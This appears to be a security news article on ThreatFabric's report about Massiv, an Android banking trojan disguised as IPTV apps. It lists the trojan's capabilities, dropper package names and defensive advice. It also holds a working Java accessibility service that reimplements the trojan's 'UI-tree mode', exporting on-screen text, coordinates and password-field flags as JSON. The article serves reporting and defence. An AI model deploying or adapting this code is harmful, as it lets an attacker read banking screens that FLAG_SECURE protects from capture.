Cybersecurity researchers have disclosed details of a new Android trojan called Massiv that is designed to facilitate device takeover (DTO) attacks for financial theft.
The malware, according to ThreatFabric, masquerades as seemingly harmless IPTV apps to deceive victims, indicating that the activity is primarily targeting users looking for online TV applications.
"This new threat, while only seen in a limited number of rather targeted campaigns, already poses a great risk to the users of mobile banking, allowing its operators to remotely control infected devices and perform device takeover attacks with further fraudulent transactions performed from the victim's banking accounts," the Dutch mobile security company said in a report shared with The Hacker News.
ThreatFabric told The Hacker News via email that the malware was first observed in a campaign targeting users in Portugal and Greece earlier this year, although it has observed samples dating back to the start of 2025 as part of smaller test campaigns.
Like various Android banking malware families, Massiv supports a range of features to facilitate credential theft through different methods: screen streaming via Android's MediaProjection API, keylogging, SMS interception, and fake overlays served on top of banking and financial apps. The overlays ask users to enter their credentials and credit card details.
One such campaign has been found to target gov.pt, a Portuguese public administration app that allows users to store identification documents and manage the Digital Mobile Key (aka Chave Móvel Digital or CMD). The overlay tricks users into entering their phone number and PIN code, likely in an effort to bypass Know Your Customer (KYC) verification.
ThreatFabric said it identified cases where scammers used the information captured through these overlays to open new bank accounts in the victim's name, allowing them to be used for money laundering or for getting loans approved without the actual victim's knowledge.
In addition, it serves as a fully functional remote-control tool, granting the operator the ability to access the victim's device stealthily while displaying a black screen overlay to conceal the malicious activity. These techniques, realized by abusing Android's accessibility services, have also been observed in several other Android bankers such as Crocodilus, Datzbro, and Klopatra.

"However, some applications implement protection against screen capture," the company explained. "To bypass it, Massiv uses so-called UI-tree mode — it traverses AccessibilityWindowInfo roots and recursively processes AccessibilityNodeInfo objects."
Screen-capture protection (typically the FLAG_SECURE window flag) blanks a window in MediaProjection output, but it does not hide that window's accessibility nodes, which is why the UI tree remains readable to an enabled accessibility service. The traversal is used to build a JSON representation of visible text and content descriptions, UI elements, screen coordinates, and interaction flags that indicate whether a UI element is clickable, editable, focused, or enabled. Only nodes that are visible and carry text are exported to the attacker, who can then decide the next course of action by issuing specific commands to interact with the device.
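As an added illustration (not code from ThreatFabric's report or from the malware itself), the following Android accessibility service performs the walk the quote describes: it iterates the window roots, recurses through every AccessibilityNodeInfo, and emits only nodes that are visible to the user and carry text or a content description, together with their screen bounds and interaction flags. The class name, the JSON field names and the service configuration are assumptions. To run at all, the service must be declared in the manifest with the BIND_ACCESSIBILITY_SERVICE permission, its configuration must set canRetrieveWindowContent and flagRetrieveInteractiveWindows, and the user has to enable it explicitly in Settings, which is the grant Android bankers of this kind have to obtain from the victim.

```java
import android.accessibilityservice.AccessibilityService;
import android.graphics.Rect;
import android.view.accessibility.AccessibilityEvent;
import android.view.accessibility.AccessibilityNodeInfo;
import android.view.accessibility.AccessibilityWindowInfo;
import org.json.JSONArray;
import org.json.JSONException;
import org.json.JSONObject;
import java.util.List;

/**
 * Illustrative "UI-tree mode": export the visible, text-bearing part of the
 * accessibility tree as JSON. Added example, not Massiv's code; the class name
 * and the JSON field names are assumptions. getWindows() only returns data when
 * the service config requests flagRetrieveInteractiveWindows.
 */
public class UiTreeDumpService extends AccessibilityService {

    @Override
    public void onAccessibilityEvent(AccessibilityEvent event) {
        // A malware operator would ship this string to a C2 on command;
        // here it is only built.
        JSONArray tree = dumpAllWindows();
        String exported = tree.toString();
    }

    @Override
    public void onInterrupt() {
        // Nothing to clean up in this illustration.
    }

    /** Walk the root node of every interactive window on screen. */
    JSONArray dumpAllWindows() {
        JSONArray out = new JSONArray();
        List<AccessibilityWindowInfo> windows = getWindows();
        for (AccessibilityWindowInfo window : windows) {
            AccessibilityNodeInfo root = window.getRoot();
            if (root != null) {
                walk(root, out);
            }
        }
        return out;
    }

    /**
     * Pre-order recursive traversal. Only nodes that are visible to the user
     * and have text or a content description are exported, matching the
     * report's description; structural nodes are skipped but still descended.
     */
    static void walk(AccessibilityNodeInfo node, JSONArray out) {
        if (node == null) {
            return;
        }
        CharSequence text = node.getText();
        CharSequence desc = node.getContentDescription();
        boolean hasText = (text != null && text.length() > 0)
                || (desc != null && desc.length() > 0);
        if (node.isVisibleToUser() && hasText) {
            Rect bounds = new Rect();
            node.getBoundsInScreen(bounds);
            try {
                JSONObject o = new JSONObject();
                o.put("class", String.valueOf(node.getClassName()));
                o.put("text", text == null ? "" : text.toString());
                o.put("desc", desc == null ? "" : desc.toString());
                // Screen coordinates let the operator issue precise clicks later.
                o.put("bounds", new JSONArray()
                        .put(bounds.left).put(bounds.top)
                        .put(bounds.right).put(bounds.bottom));
                o.put("clickable", node.isClickable());
                o.put("editable", node.isEditable());
                o.put("focused", node.isFocused());
                o.put("enabled", node.isEnabled());
                o.put("password", node.isPassword());
                out.put(o);
            } catch (JSONException ignored) {
                // Field names are constant, so this cannot happen in practice.
            }
        }
        for (int i = 0; i < node.getChildCount(); i++) {
            walk(node.getChild(i), out);
        }
    }
}
```

Two practical consequences follow for app developers. FLAG_SECURE defeats the MediaProjection streaming path but leaves this walk untouched, so a banking app that wants a signal for this class of attack can enumerate active services with AccessibilityManager.getEnabledAccessibilityServiceList(AccessibilityServiceInfo.FEEDBACK_ALL_MASK) and treat an unrecognized service as a risk indicator before showing sensitive screens. Marking sensitive views android:importantForAccessibility="no" removes them from the default tree, but a service that sets FLAG_INCLUDE_NOT_IMPORTANT_VIEWS gets them back, so that attribute is not a control to rely on.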

The malware is equipped to carry out a range of malicious actions –
- Enable black overlay, mute sounds and vibration
- Send device information
- Perform click and swipe actions
- Alter clipboard with specific text
- Disable black screen
- Turn screen streaming on/off
- Unlock device with pattern
- Serve overlays for an app, device pattern lock, or PIN
- Download ZIP archive with overlays for targeted applications
- Download and install APK files
- Open Battery Optimization, Device Admin, and Play Protect settings screens
- Request permissions to access SMS messages and install APK packages
- Clear log databases on the device
Massiv is distributed in the form of dropper apps mimicking IPTV apps via SMS phishing. Once installed and launched, the dropper prompts the victim to install an "important" update by granting it permission to install software from external sources. The names of the malicious artifacts are listed below –
- IPTV24 (hfgx.mqfy.fejku) – Dropper
- Google Play (hobfjp.anrxf.cucm) – Massiv
"In most of the cases observed, it's just masquerading," ThreatFabric said. "No actual IPTV applications were infected or initially contained malicious code. Usually, the dropper that mimics an IPTV app opens a WebView with an IPTV website in it, while the actual malware is already installed and running on the device."
The majority of Android malware campaigns using TV-related droppers have targeted Spain, Portugal, France, and Turkey over the past six months.
Massiv is the latest entrant to an already crowded Android threat landscape, reflecting the continuing demand for such turnkey solutions among cybercriminals.
"While not yet observed being advertised as Malware-as-a-Service, Massiv's operator shows clear signs of going this path, introducing API keys to be used in malware communication with the backend," ThreatFabric said. "Code analysis revealed ongoing development, with more features likely to be introduced in the future."

